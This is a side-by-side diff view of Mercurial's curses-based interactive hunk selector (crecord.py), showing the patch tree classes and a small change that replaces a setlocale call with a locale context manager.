20 getattr,
19 getattr,
21 open,
20 open,
22 )
21 )
23 from . import (
22 from . import (
24 encoding,
23 encoding,
25 error,
24 error,
26 patch as patchmod,
25 patch as patchmod,
27 pycompat,
26 pycompat,
28 scmutil,
27 scmutil,
29 util,
28 util,
30 )
29 )
31 from .utils import stringutil
30 from .utils import stringutil
32
31
33 stringio = util.stringio
32 stringio = util.stringio
34
33
35 # patch comments based on the git one
34 # patch comments based on the git one
36 diffhelptext = _(
35 diffhelptext = _(
37 """# To remove '-' lines, make them ' ' lines (context).
36 """# To remove '-' lines, make them ' ' lines (context).
38 # To remove '+' lines, delete them.
37 # To remove '+' lines, delete them.
39 # Lines starting with # will be removed from the patch.
38 # Lines starting with # will be removed from the patch.
40 """
39 """
41 )
40 )
42
41
43 hunkhelptext = _(
42 hunkhelptext = _(
44 """#
43 """#
45 # If the patch applies cleanly, the edited hunk will immediately be
44 # If the patch applies cleanly, the edited hunk will immediately be
46 # added to the record list. If it does not apply cleanly, a rejects file
45 # added to the record list. If it does not apply cleanly, a rejects file
47 # will be generated. You can use that when you try again. If all lines
46 # will be generated. You can use that when you try again. If all lines
48 # of the hunk are removed, then the edit is aborted and the hunk is left
47 # of the hunk are removed, then the edit is aborted and the hunk is left
49 # unchanged.
48 # unchanged.
50 """
49 """
51 )
50 )
52
51
53 patchhelptext = _(
52 patchhelptext = _(
54 """#
53 """#
55 # If the patch applies cleanly, the edited patch will immediately
54 # If the patch applies cleanly, the edited patch will immediately
56 # be finalised. If it does not apply cleanly, rejects files will be
55 # be finalised. If it does not apply cleanly, rejects files will be
57 # generated. You can use those when you try again.
56 # generated. You can use those when you try again.
58 """
57 """
59 )
58 )
60
59
61 try:
60 try:
62 import curses
61 import curses
63 import curses.ascii
62 import curses.ascii
64
63
65 curses.error
64 curses.error
66 except (ImportError, AttributeError):
65 except (ImportError, AttributeError):
67 curses = False
66 curses = False
68
67
69
68
70 class fallbackerror(error.Abort):
69 class fallbackerror(error.Abort):
71 """Error that indicates the client should try to fallback to text mode."""
70 """Error that indicates the client should try to fallback to text mode."""
72
71
73 # Inherits from error.Abort so that existing behavior is preserved if the
72 # Inherits from error.Abort so that existing behavior is preserved if the
74 # calling code does not know how to fallback.
73 # calling code does not know how to fallback.
75
74
76
75
77 def checkcurses(ui):
76 def checkcurses(ui):
78 """Return True if the user wants to use curses
77 """Return True if the user wants to use curses
79
78
80 This method returns True if curses is found (and that python is built with
79 This method returns True if curses is found (and that python is built with
81 it) and that the user has the correct flag for the ui.
80 it) and that the user has the correct flag for the ui.
82 """
81 """
83 return curses and ui.interface(b"chunkselector") == b"curses"
82 return curses and ui.interface(b"chunkselector") == b"curses"
84
83
85
84
86 class patchnode(object):
85 class patchnode(object):
87 """abstract class for patch graph nodes
86 """abstract class for patch graph nodes
88 (i.e. patchroot, header, hunk, hunkline)
87 (i.e. patchroot, header, hunk, hunkline)
89 """
88 """
90
89
91 def firstchild(self):
90 def firstchild(self):
92 raise NotImplementedError(b"method must be implemented by subclass")
91 raise NotImplementedError(b"method must be implemented by subclass")
93
92
94 def lastchild(self):
93 def lastchild(self):
95 raise NotImplementedError(b"method must be implemented by subclass")
94 raise NotImplementedError(b"method must be implemented by subclass")
96
95
97 def allchildren(self):
96 def allchildren(self):
98 """Return a list of all of the direct children of this node"""
97 """Return a list of all of the direct children of this node"""
99 raise NotImplementedError(b"method must be implemented by subclass")
98 raise NotImplementedError(b"method must be implemented by subclass")
100
99
101 def nextsibling(self):
100 def nextsibling(self):
102 """
101 """
103 Return the closest next item of the same type where there are no items
102 Return the closest next item of the same type where there are no items
104 of different types between the current item and this closest item.
103 of different types between the current item and this closest item.
105 If no such item exists, return None.
104 If no such item exists, return None.
106 """
105 """
107 raise NotImplementedError(b"method must be implemented by subclass")
106 raise NotImplementedError(b"method must be implemented by subclass")
108
107
109 def prevsibling(self):
108 def prevsibling(self):
110 """
109 """
111 Return the closest previous item of the same type where there are no
110 Return the closest previous item of the same type where there are no
112 items of different types between the current item and this closest item.
111 items of different types between the current item and this closest item.
113 If no such item exists, return None.
112 If no such item exists, return None.
114 """
113 """
115 raise NotImplementedError(b"method must be implemented by subclass")
114 raise NotImplementedError(b"method must be implemented by subclass")
116
115
117 def parentitem(self):
116 def parentitem(self):
118 raise NotImplementedError(b"method must be implemented by subclass")
117 raise NotImplementedError(b"method must be implemented by subclass")
119
118
120 def nextitem(self, skipfolded=True):
119 def nextitem(self, skipfolded=True):
121 """
120 """
122 Try to return the next item closest to this item, regardless of item's
121 Try to return the next item closest to this item, regardless of item's
123 type (header, hunk, or hunkline).
122 type (header, hunk, or hunkline).
124
123
125 If skipfolded == True, and the current item is folded, then the child
124 If skipfolded == True, and the current item is folded, then the child
126 items that are hidden due to folding will be skipped when determining
125 items that are hidden due to folding will be skipped when determining
127 the next item.
126 the next item.
128
127
129 If it is not possible to get the next item, return None.
128 If it is not possible to get the next item, return None.
130 """
129 """
131 try:
130 try:
132 itemfolded = self.folded
131 itemfolded = self.folded
133 except AttributeError:
132 except AttributeError:
134 itemfolded = False
133 itemfolded = False
135 if skipfolded and itemfolded:
134 if skipfolded and itemfolded:
136 nextitem = self.nextsibling()
135 nextitem = self.nextsibling()
137 if nextitem is None:
136 if nextitem is None:
138 try:
137 try:
139 nextitem = self.parentitem().nextsibling()
138 nextitem = self.parentitem().nextsibling()
140 except AttributeError:
139 except AttributeError:
141 nextitem = None
140 nextitem = None
142 return nextitem
141 return nextitem
143 else:
142 else:
144 # try child
143 # try child
145 item = self.firstchild()
144 item = self.firstchild()
146 if item is not None:
145 if item is not None:
147 return item
146 return item
148
147
149 # else try next sibling
148 # else try next sibling
150 item = self.nextsibling()
149 item = self.nextsibling()
151 if item is not None:
150 if item is not None:
152 return item
151 return item
153
152
154 try:
153 try:
155 # else try parent's next sibling
154 # else try parent's next sibling
156 item = self.parentitem().nextsibling()
155 item = self.parentitem().nextsibling()
157 if item is not None:
156 if item is not None:
158 return item
157 return item
159
158
160 # else return grandparent's next sibling (or None)
159 # else return grandparent's next sibling (or None)
161 return self.parentitem().parentitem().nextsibling()
160 return self.parentitem().parentitem().nextsibling()
162
161
163 except AttributeError: # parent and/or grandparent was None
162 except AttributeError: # parent and/or grandparent was None
164 return None
163 return None
165
164
166 def previtem(self):
165 def previtem(self):
167 """
166 """
168 Try to return the previous item closest to this item, regardless of
167 Try to return the previous item closest to this item, regardless of
169 item's type (header, hunk, or hunkline).
168 item's type (header, hunk, or hunkline).
170
169
171 If it is not possible to get the previous item, return None.
170 If it is not possible to get the previous item, return None.
172 """
171 """
173 # try previous sibling's last child's last child,
172 # try previous sibling's last child's last child,
174 # else try previous sibling's last child, else try previous sibling
173 # else try previous sibling's last child, else try previous sibling
175 prevsibling = self.prevsibling()
174 prevsibling = self.prevsibling()
176 if prevsibling is not None:
175 if prevsibling is not None:
177 prevsiblinglastchild = prevsibling.lastchild()
176 prevsiblinglastchild = prevsibling.lastchild()
178 if (prevsiblinglastchild is not None) and not prevsibling.folded:
177 if (prevsiblinglastchild is not None) and not prevsibling.folded:
179 prevsiblinglclc = prevsiblinglastchild.lastchild()
178 prevsiblinglclc = prevsiblinglastchild.lastchild()
180 if (
179 if (
181 prevsiblinglclc is not None
180 prevsiblinglclc is not None
182 ) and not prevsiblinglastchild.folded:
181 ) and not prevsiblinglastchild.folded:
183 return prevsiblinglclc
182 return prevsiblinglclc
184 else:
183 else:
185 return prevsiblinglastchild
184 return prevsiblinglastchild
186 else:
185 else:
187 return prevsibling
186 return prevsibling
188
187
189 # try parent (or None)
188 # try parent (or None)
190 return self.parentitem()
189 return self.parentitem()
191
190
192
191
193 class patch(patchnode, list): # todo: rename patchroot
192 class patch(patchnode, list): # todo: rename patchroot
194 """
193 """
195 list of header objects representing the patch.
194 list of header objects representing the patch.
196 """
195 """
197
196
198 def __init__(self, headerlist):
197 def __init__(self, headerlist):
199 self.extend(headerlist)
198 self.extend(headerlist)
200 # add parent patch object reference to each header
199 # add parent patch object reference to each header
201 for header in self:
200 for header in self:
202 header.patch = self
201 header.patch = self
203
202
204
203
205 class uiheader(patchnode):
204 class uiheader(patchnode):
206 """patch header
205 """patch header
207
206
208 xxx shouldn't we move this to mercurial/patch.py ?
207 xxx shouldn't we move this to mercurial/patch.py ?
209 """
208 """
210
209
211 def __init__(self, header):
210 def __init__(self, header):
212 self.nonuiheader = header
211 self.nonuiheader = header
213 # flag to indicate whether to apply this chunk
212 # flag to indicate whether to apply this chunk
214 self.applied = True
213 self.applied = True
215 # flag which only affects the status display indicating if a node's
214 # flag which only affects the status display indicating if a node's
216 # children are partially applied (i.e. some applied, some not).
215 # children are partially applied (i.e. some applied, some not).
217 self.partial = False
216 self.partial = False
218
217
219 # flag to indicate whether to display as folded/unfolded to user
218 # flag to indicate whether to display as folded/unfolded to user
220 self.folded = True
219 self.folded = True
221
220
222 # list of all headers in patch
221 # list of all headers in patch
223 self.patch = None
222 self.patch = None
224
223
225 # flag is False if this header was ever unfolded from initial state
224 # flag is False if this header was ever unfolded from initial state
226 self.neverunfolded = True
225 self.neverunfolded = True
227 self.hunks = [uihunk(h, self) for h in self.hunks]
226 self.hunks = [uihunk(h, self) for h in self.hunks]
228
227
229 def prettystr(self):
228 def prettystr(self):
230 x = stringio()
229 x = stringio()
231 self.pretty(x)
230 self.pretty(x)
232 return x.getvalue()
231 return x.getvalue()
233
232
234 def nextsibling(self):
233 def nextsibling(self):
235 numheadersinpatch = len(self.patch)
234 numheadersinpatch = len(self.patch)
236 indexofthisheader = self.patch.index(self)
235 indexofthisheader = self.patch.index(self)
237
236
238 if indexofthisheader < numheadersinpatch - 1:
237 if indexofthisheader < numheadersinpatch - 1:
239 nextheader = self.patch[indexofthisheader + 1]
238 nextheader = self.patch[indexofthisheader + 1]
240 return nextheader
239 return nextheader
241 else:
240 else:
242 return None
241 return None
243
242
244 def prevsibling(self):
243 def prevsibling(self):
245 indexofthisheader = self.patch.index(self)
244 indexofthisheader = self.patch.index(self)
246 if indexofthisheader > 0:
245 if indexofthisheader > 0:
247 previousheader = self.patch[indexofthisheader - 1]
246 previousheader = self.patch[indexofthisheader - 1]
248 return previousheader
247 return previousheader
249 else:
248 else:
250 return None
249 return None
251
250
252 def parentitem(self):
251 def parentitem(self):
253 """
252 """
254 there is no 'real' parent item of a header that can be selected,
253 there is no 'real' parent item of a header that can be selected,
255 so return None.
254 so return None.
256 """
255 """
257 return None
256 return None
258
257
259 def firstchild(self):
258 def firstchild(self):
260 """return the first child of this item, if one exists. otherwise
259 """return the first child of this item, if one exists. otherwise
261 None."""
260 None."""
262 if len(self.hunks) > 0:
261 if len(self.hunks) > 0:
263 return self.hunks[0]
262 return self.hunks[0]
264 else:
263 else:
265 return None
264 return None
266
265
267 def lastchild(self):
266 def lastchild(self):
268 """return the last child of this item, if one exists. otherwise
267 """return the last child of this item, if one exists. otherwise
269 None."""
268 None."""
270 if len(self.hunks) > 0:
269 if len(self.hunks) > 0:
271 return self.hunks[-1]
270 return self.hunks[-1]
272 else:
271 else:
273 return None
272 return None
274
273
275 def allchildren(self):
274 def allchildren(self):
276 """return a list of all of the direct children of this node"""
275 """return a list of all of the direct children of this node"""
277 return self.hunks
276 return self.hunks
278
277
279 def __getattr__(self, name):
278 def __getattr__(self, name):
280 return getattr(self.nonuiheader, name)
279 return getattr(self.nonuiheader, name)
281
280
282
281
283 class uihunkline(patchnode):
282 class uihunkline(patchnode):
284 """represents a changed line in a hunk"""
283 """represents a changed line in a hunk"""
285
284
286 def __init__(self, linetext, hunk):
285 def __init__(self, linetext, hunk):
287 self.linetext = linetext
286 self.linetext = linetext
288 self.applied = True
287 self.applied = True
289 # the parent hunk to which this line belongs
288 # the parent hunk to which this line belongs
290 self.hunk = hunk
289 self.hunk = hunk
291 # folding lines currently is not used/needed, but this flag is needed
290 # folding lines currently is not used/needed, but this flag is needed
292 # in the previtem method.
291 # in the previtem method.
293 self.folded = False
292 self.folded = False
294
293
295 def prettystr(self):
294 def prettystr(self):
296 return self.linetext
295 return self.linetext
297
296
298 def nextsibling(self):
297 def nextsibling(self):
299 numlinesinhunk = len(self.hunk.changedlines)
298 numlinesinhunk = len(self.hunk.changedlines)
300 indexofthisline = self.hunk.changedlines.index(self)
299 indexofthisline = self.hunk.changedlines.index(self)
301
300
302 if indexofthisline < numlinesinhunk - 1:
301 if indexofthisline < numlinesinhunk - 1:
303 nextline = self.hunk.changedlines[indexofthisline + 1]
302 nextline = self.hunk.changedlines[indexofthisline + 1]
304 return nextline
303 return nextline
305 else:
304 else:
306 return None
305 return None
307
306
308 def prevsibling(self):
307 def prevsibling(self):
309 indexofthisline = self.hunk.changedlines.index(self)
308 indexofthisline = self.hunk.changedlines.index(self)
310 if indexofthisline > 0:
309 if indexofthisline > 0:
311 previousline = self.hunk.changedlines[indexofthisline - 1]
310 previousline = self.hunk.changedlines[indexofthisline - 1]
312 return previousline
311 return previousline
313 else:
312 else:
314 return None
313 return None
315
314
316 def parentitem(self):
315 def parentitem(self):
317 """return the parent to the current item"""
316 """return the parent to the current item"""
318 return self.hunk
317 return self.hunk
319
318
320 def firstchild(self):
319 def firstchild(self):
321 """return the first child of this item, if one exists. otherwise
320 """return the first child of this item, if one exists. otherwise
322 None."""
321 None."""
323 # hunk-lines don't have children
322 # hunk-lines don't have children
324 return None
323 return None
325
324
326 def lastchild(self):
325 def lastchild(self):
327 """return the last child of this item, if one exists. otherwise
326 """return the last child of this item, if one exists. otherwise
328 None."""
327 None."""
329 # hunk-lines don't have children
328 # hunk-lines don't have children
330 return None
329 return None
331
330
332
331
333 class uihunk(patchnode):
332 class uihunk(patchnode):
334 """ui patch hunk, wraps a hunk and keep track of ui behavior """
333 """ui patch hunk, wraps a hunk and keep track of ui behavior """
335
334
336 maxcontext = 3
335 maxcontext = 3
337
336
338 def __init__(self, hunk, header):
337 def __init__(self, hunk, header):
339 self._hunk = hunk
338 self._hunk = hunk
340 self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
339 self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
341 self.header = header
340 self.header = header
342 # used at end for detecting how many removed lines were un-applied
341 # used at end for detecting how many removed lines were un-applied
343 self.originalremoved = self.removed
342 self.originalremoved = self.removed
344
343
345 # flag to indicate whether to display as folded/unfolded to user
344 # flag to indicate whether to display as folded/unfolded to user
346 self.folded = True
345 self.folded = True
347 # flag to indicate whether to apply this chunk
346 # flag to indicate whether to apply this chunk
348 self.applied = True
347 self.applied = True
349 # flag which only affects the status display indicating if a node's
348 # flag which only affects the status display indicating if a node's
350 # children are partially applied (i.e. some applied, some not).
349 # children are partially applied (i.e. some applied, some not).
351 self.partial = False
350 self.partial = False
352
351
353 def nextsibling(self):
352 def nextsibling(self):
354 numhunksinheader = len(self.header.hunks)
353 numhunksinheader = len(self.header.hunks)
355 indexofthishunk = self.header.hunks.index(self)
354 indexofthishunk = self.header.hunks.index(self)
356
355
357 if indexofthishunk < numhunksinheader - 1:
356 if indexofthishunk < numhunksinheader - 1:
358 nexthunk = self.header.hunks[indexofthishunk + 1]
357 nexthunk = self.header.hunks[indexofthishunk + 1]
359 return nexthunk
358 return nexthunk
360 else:
359 else:
361 return None
360 return None
362
361
363 def prevsibling(self):
362 def prevsibling(self):
364 indexofthishunk = self.header.hunks.index(self)
363 indexofthishunk = self.header.hunks.index(self)
365 if indexofthishunk > 0:
364 if indexofthishunk > 0:
366 previoushunk = self.header.hunks[indexofthishunk - 1]
365 previoushunk = self.header.hunks[indexofthishunk - 1]
367 return previoushunk
366 return previoushunk
368 else:
367 else:
369 return None
368 return None
370
369
371 def parentitem(self):
370 def parentitem(self):
372 """return the parent to the current item"""
371 """return the parent to the current item"""
373 return self.header
372 return self.header
374
373
375 def firstchild(self):
374 def firstchild(self):
376 """return the first child of this item, if one exists. otherwise
375 """return the first child of this item, if one exists. otherwise
377 None."""
376 None."""
378 if len(self.changedlines) > 0:
377 if len(self.changedlines) > 0:
379 return self.changedlines[0]
378 return self.changedlines[0]
380 else:
379 else:
381 return None
380 return None
382
381
383 def lastchild(self):
382 def lastchild(self):
384 """return the last child of this item, if one exists. otherwise
383 """return the last child of this item, if one exists. otherwise
385 None."""
384 None."""
386 if len(self.changedlines) > 0:
385 if len(self.changedlines) > 0:
387 return self.changedlines[-1]
386 return self.changedlines[-1]
388 else:
387 else:
389 return None
388 return None
390
389
391 def allchildren(self):
390 def allchildren(self):
392 """return a list of all of the direct children of this node"""
391 """return a list of all of the direct children of this node"""
393 return self.changedlines
392 return self.changedlines
394
393
395 def countchanges(self):
394 def countchanges(self):
396 """changedlines -> (n+,n-)"""
395 """changedlines -> (n+,n-)"""
397 add = len(
396 add = len(
398 [
397 [
399 l
398 l
400 for l in self.changedlines
399 for l in self.changedlines
401 if l.applied and l.prettystr().startswith(b'+')
400 if l.applied and l.prettystr().startswith(b'+')
402 ]
401 ]
403 )
402 )
404 rem = len(
403 rem = len(
405 [
404 [
406 l
405 l
407 for l in self.changedlines
406 for l in self.changedlines
408 if l.applied and l.prettystr().startswith(b'-')
407 if l.applied and l.prettystr().startswith(b'-')
409 ]
408 ]
410 )
409 )
411 return add, rem
410 return add, rem
412
411
413 def getfromtoline(self):
412 def getfromtoline(self):
414 # calculate the number of removed lines converted to context lines
413 # calculate the number of removed lines converted to context lines
415 removedconvertedtocontext = self.originalremoved - self.removed
414 removedconvertedtocontext = self.originalremoved - self.removed
416
415
417 contextlen = (
416 contextlen = (
418 len(self.before) + len(self.after) + removedconvertedtocontext
417 len(self.before) + len(self.after) + removedconvertedtocontext
419 )
418 )
420 if self.after and self.after[-1] == b'\\ No newline at end of file\n':
419 if self.after and self.after[-1] == b'\\ No newline at end of file\n':
421 contextlen -= 1
420 contextlen -= 1
422 fromlen = contextlen + self.removed
421 fromlen = contextlen + self.removed
423 tolen = contextlen + self.added
422 tolen = contextlen + self.added
424
423
425 # diffutils manual, section "2.2.2.2 detailed description of unified
424 # diffutils manual, section "2.2.2.2 detailed description of unified
426 # format": "an empty hunk is considered to end at the line that
425 # format": "an empty hunk is considered to end at the line that
427 # precedes the hunk."
426 # precedes the hunk."
428 #
427 #
429 # so, if either of hunks is empty, decrease its line start. --immerrr
428 # so, if either of hunks is empty, decrease its line start. --immerrr
430 # but only do this if fromline > 0, to avoid having, e.g fromline=-1.
429 # but only do this if fromline > 0, to avoid having, e.g fromline=-1.
431 fromline, toline = self.fromline, self.toline
430 fromline, toline = self.fromline, self.toline
432 if fromline != 0:
431 if fromline != 0:
433 if fromlen == 0:
432 if fromlen == 0:
434 fromline -= 1
433 fromline -= 1
435 if tolen == 0 and toline > 0:
434 if tolen == 0 and toline > 0:
436 toline -= 1
435 toline -= 1
437
436
438 fromtoline = b'@@ -%d,%d +%d,%d @@%s\n' % (
437 fromtoline = b'@@ -%d,%d +%d,%d @@%s\n' % (
439 fromline,
438 fromline,
440 fromlen,
439 fromlen,
441 toline,
440 toline,
442 tolen,
441 tolen,
443 self.proc and (b' ' + self.proc),
442 self.proc and (b' ' + self.proc),
444 )
443 )
445 return fromtoline
444 return fromtoline
446
445
447 def write(self, fp):
446 def write(self, fp):
448 # updated self.added/removed, which are used by getfromtoline()
447 # updated self.added/removed, which are used by getfromtoline()
449 self.added, self.removed = self.countchanges()
448 self.added, self.removed = self.countchanges()
450 fp.write(self.getfromtoline())
449 fp.write(self.getfromtoline())
451
450
452 hunklinelist = []
451 hunklinelist = []
453 # add the following to the list: (1) all applied lines, and
452 # add the following to the list: (1) all applied lines, and
454 # (2) all unapplied removal lines (convert these to context lines)
453 # (2) all unapplied removal lines (convert these to context lines)
455 for changedline in self.changedlines:
454 for changedline in self.changedlines:
456 changedlinestr = changedline.prettystr()
455 changedlinestr = changedline.prettystr()
457 if changedline.applied:
456 if changedline.applied:
458 hunklinelist.append(changedlinestr)
457 hunklinelist.append(changedlinestr)
459 elif changedlinestr.startswith(b"-"):
458 elif changedlinestr.startswith(b"-"):
460 hunklinelist.append(b" " + changedlinestr[1:])
459 hunklinelist.append(b" " + changedlinestr[1:])
461
460
462 fp.write(b''.join(self.before + hunklinelist + self.after))
461 fp.write(b''.join(self.before + hunklinelist + self.after))
463
462
464 pretty = write
463 pretty = write
465
464
466 def prettystr(self):
465 def prettystr(self):
467 x = stringio()
466 x = stringio()
468 self.pretty(x)
467 self.pretty(x)
469 return x.getvalue()
468 return x.getvalue()
470
469
471 def reversehunk(self):
470 def reversehunk(self):
472 """return a recordhunk which is the reverse of the hunk
471 """return a recordhunk which is the reverse of the hunk
473
472
474 Assuming the displayed patch is diff(A, B) result. The returned hunk is
473 Assuming the displayed patch is diff(A, B) result. The returned hunk is
475 intended to be applied to B, instead of A.
474 intended to be applied to B, instead of A.
476
475
477 For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
476 For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
478 the user made the following selection:
477 the user made the following selection:
479
478
480 0
479 0
481 [x] -1 [x]: selected
480 [x] -1 [x]: selected
482 [ ] -2 [ ]: not selected
481 [ ] -2 [ ]: not selected
483 [x] +3
482 [x] +3
484 [ ] +4
483 [ ] +4
485 [x] +5
484 [x] +5
486 6
485 6
487
486
488 This function returns a hunk like:
487 This function returns a hunk like:
489
488
490 0
489 0
491 -3
490 -3
492 -4
491 -4
493 -5
492 -5
494 +1
493 +1
495 +4
494 +4
496 6
495 6
497
496
498 Note "4" was first deleted then added. That's because "4" exists in B
497 Note "4" was first deleted then added. That's because "4" exists in B
499 side and "-4" must exist between "-3" and "-5" to make the patch
498 side and "-4" must exist between "-3" and "-5" to make the patch
500 applicable to B.
499 applicable to B.
501 """
500 """
502 dels = []
501 dels = []
503 adds = []
502 adds = []
504 for line in self.changedlines:
503 for line in self.changedlines:
505 text = line.linetext
504 text = line.linetext
506 if line.applied:
505 if line.applied:
507 if text.startswith(b'+'):
506 if text.startswith(b'+'):
508 dels.append(text[1:])
507 dels.append(text[1:])
509 elif text.startswith(b'-'):
508 elif text.startswith(b'-'):
510 adds.append(text[1:])
509 adds.append(text[1:])
511 elif text.startswith(b'+'):
510 elif text.startswith(b'+'):
512 dels.append(text[1:])
511 dels.append(text[1:])
513 adds.append(text[1:])
512 adds.append(text[1:])
514 hunk = [b'-%s' % l for l in dels] + [b'+%s' % l for l in adds]
513 hunk = [b'-%s' % l for l in dels] + [b'+%s' % l for l in adds]
515 h = self._hunk
514 h = self._hunk
516 return patchmod.recordhunk(
515 return patchmod.recordhunk(
517 h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
516 h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
518 )
517 )
519
518
520 def __getattr__(self, name):
519 def __getattr__(self, name):
521 return getattr(self._hunk, name)
520 return getattr(self._hunk, name)
522
521
523 def __repr__(self):
522 def __repr__(self):
524 return '<hunk %r@%d>' % (self.filename(), self.fromline)
523 return '<hunk %r@%d>' % (self.filename(), self.fromline)
525
524
526
525
527 def filterpatch(ui, chunks, chunkselector, operation=None):
526 def filterpatch(ui, chunks, chunkselector, operation=None):
528 """interactively filter patch chunks into applied-only chunks"""
527 """interactively filter patch chunks into applied-only chunks"""
529 chunks = list(chunks)
528 chunks = list(chunks)
530 # convert chunks list into structure suitable for displaying/modifying
529 # convert chunks list into structure suitable for displaying/modifying
531 # with curses. create a list of headers only.
530 # with curses. create a list of headers only.
532 headers = [c for c in chunks if isinstance(c, patchmod.header)]
531 headers = [c for c in chunks if isinstance(c, patchmod.header)]
533
532
534 # if there are no changed files
533 # if there are no changed files
535 if len(headers) == 0:
534 if len(headers) == 0:
536 return [], {}
535 return [], {}
537 uiheaders = [uiheader(h) for h in headers]
536 uiheaders = [uiheader(h) for h in headers]
538 # let user choose headers/hunks/lines, and mark their applied flags
537 # let user choose headers/hunks/lines, and mark their applied flags
539 # accordingly
538 # accordingly
540 ret = chunkselector(ui, uiheaders, operation=operation)
539 ret = chunkselector(ui, uiheaders, operation=operation)
541 appliedhunklist = []
540 appliedhunklist = []
542 for hdr in uiheaders:
541 for hdr in uiheaders:
543 if hdr.applied and (
542 if hdr.applied and (
544 hdr.special() or len([h for h in hdr.hunks if h.applied]) > 0
543 hdr.special() or len([h for h in hdr.hunks if h.applied]) > 0
545 ):
544 ):
546 appliedhunklist.append(hdr)
545 appliedhunklist.append(hdr)
547 fixoffset = 0
546 fixoffset = 0
548 for hnk in hdr.hunks:
547 for hnk in hdr.hunks:
549 if hnk.applied:
548 if hnk.applied:
550 appliedhunklist.append(hnk)
549 appliedhunklist.append(hnk)
551 # adjust the 'to'-line offset of the hunk to be correct
550 # adjust the 'to'-line offset of the hunk to be correct
552 # after de-activating some of the other hunks for this file
551 # after de-activating some of the other hunks for this file
553 if fixoffset:
552 if fixoffset:
554 # hnk = copy.copy(hnk) # necessary??
553 # hnk = copy.copy(hnk) # necessary??
555 hnk.toline += fixoffset
554 hnk.toline += fixoffset
556 else:
555 else:
557 fixoffset += hnk.removed - hnk.added
556 fixoffset += hnk.removed - hnk.added
558
557
559 return (appliedhunklist, ret)
558 return (appliedhunklist, ret)
560
559
561
560
562 def chunkselector(ui, headerlist, operation=None):
561 def chunkselector(ui, headerlist, operation=None):
563 """
562 """
564 curses interface to get selection of chunks, and mark the applied flags
563 curses interface to get selection of chunks, and mark the applied flags
565 of the chosen chunks.
564 of the chosen chunks.
566 """
565 """
567 ui.write(_(b'starting interactive selection\n'))
566 ui.write(_(b'starting interactive selection\n'))
568 chunkselector = curseschunkselector(headerlist, ui, operation)
567 chunkselector = curseschunkselector(headerlist, ui, operation)
569 # This is required for ncurses to display non-ASCII characters in
570 # default user locale encoding correctly. --immerrr
571 locale.setlocale(locale.LC_ALL, '')
572 origsigtstp = sentinel = object()
568 origsigtstp = sentinel = object()
573 if util.safehasattr(signal, b'SIGTSTP'):
569 if util.safehasattr(signal, b'SIGTSTP'):
574 origsigtstp = signal.getsignal(signal.SIGTSTP)
570 origsigtstp = signal.getsignal(signal.SIGTSTP)
575 try:
571 try:
576 curses.wrapper(chunkselector.main)
572 with util.with_lc_ctype():
573 curses.wrapper(chunkselector.main)
577 if chunkselector.initexc is not None:
574 if chunkselector.initexc is not None:
578 raise chunkselector.initexc
575 raise chunkselector.initexc
579 # ncurses does not restore signal handler for SIGTSTP
576 # ncurses does not restore signal handler for SIGTSTP
580 finally:
577 finally:
581 if origsigtstp is not sentinel:
578 if origsigtstp is not sentinel:
582 signal.signal(signal.SIGTSTP, origsigtstp)
579 signal.signal(signal.SIGTSTP, origsigtstp)
583 return chunkselector.opts
580 return chunkselector.opts
584
581
585
582
586 def testdecorator(testfn, f):
583 def testdecorator(testfn, f):
587 def u(*args, **kwargs):
584 def u(*args, **kwargs):
588 return f(testfn, *args, **kwargs)
585 return f(testfn, *args, **kwargs)
589
586
590 return u
587 return u
591
588
592
589
593 def testchunkselector(testfn, ui, headerlist, operation=None):
590 def testchunkselector(testfn, ui, headerlist, operation=None):
594 """
591 """
595 test interface to get selection of chunks, and mark the applied flags
592 test interface to get selection of chunks, and mark the applied flags
596 of the chosen chunks.
593 of the chosen chunks.
597 """
594 """
598 chunkselector = curseschunkselector(headerlist, ui, operation)
595 chunkselector = curseschunkselector(headerlist, ui, operation)
599
596
600 class dummystdscr(object):
597 class dummystdscr(object):
601 def clear(self):
598 def clear(self):
602 pass
599 pass
603
600
604 def refresh(self):
601 def refresh(self):
605 pass
602 pass
606
603
607 chunkselector.stdscr = dummystdscr()
604 chunkselector.stdscr = dummystdscr()
608 if testfn and os.path.exists(testfn):
605 if testfn and os.path.exists(testfn):
609 testf = open(testfn, 'r')
606 testf = open(testfn, 'r')
610 testcommands = [x.rstrip('\n') for x in testf.readlines()]
607 testcommands = [x.rstrip('\n') for x in testf.readlines()]
611 testf.close()
608 testf.close()
612 while True:
609 while True:
613 if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
610 if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
614 break
611 break
615 return chunkselector.opts
612 return chunkselector.opts
616
613
617
614
618 _headermessages = { # {operation: text}
615 _headermessages = { # {operation: text}
619 b'apply': _(b'Select hunks to apply'),
616 b'apply': _(b'Select hunks to apply'),
620 b'discard': _(b'Select hunks to discard'),
617 b'discard': _(b'Select hunks to discard'),
621 b'keep': _(b'Select hunks to keep'),
618 b'keep': _(b'Select hunks to keep'),
622 None: _(b'Select hunks to record'),
619 None: _(b'Select hunks to record'),
623 }
620 }
624
621
625
622
626 class curseschunkselector(object):
623 class curseschunkselector(object):
627 def __init__(self, headerlist, ui, operation=None):
624 def __init__(self, headerlist, ui, operation=None):
628 # put the headers into a patch object
625 # put the headers into a patch object
629 self.headerlist = patch(headerlist)
626 self.headerlist = patch(headerlist)
630
627
631 self.ui = ui
628 self.ui = ui
632 self.opts = {}
629 self.opts = {}
633
630
634 self.errorstr = None
631 self.errorstr = None
635 # list of all chunks
632 # list of all chunks
636 self.chunklist = []
633 self.chunklist = []
637 for h in headerlist:
634 for h in headerlist:
638 self.chunklist.append(h)
635 self.chunklist.append(h)
639 self.chunklist.extend(h.hunks)
636 self.chunklist.extend(h.hunks)
640
637
641 # dictionary mapping (fgcolor, bgcolor) pairs to the
638 # dictionary mapping (fgcolor, bgcolor) pairs to the
642 # corresponding curses color-pair value.
639 # corresponding curses color-pair value.
643 self.colorpairs = {}
640 self.colorpairs = {}
644 # maps custom nicknames of color-pairs to curses color-pair values
641 # maps custom nicknames of color-pairs to curses color-pair values
645 self.colorpairnames = {}
642 self.colorpairnames = {}
646
643
647 # Honor color setting of ui section. Keep colored setup as
644 # Honor color setting of ui section. Keep colored setup as
648 # long as not explicitly set to a falsy value - especially,
645 # long as not explicitly set to a falsy value - especially,
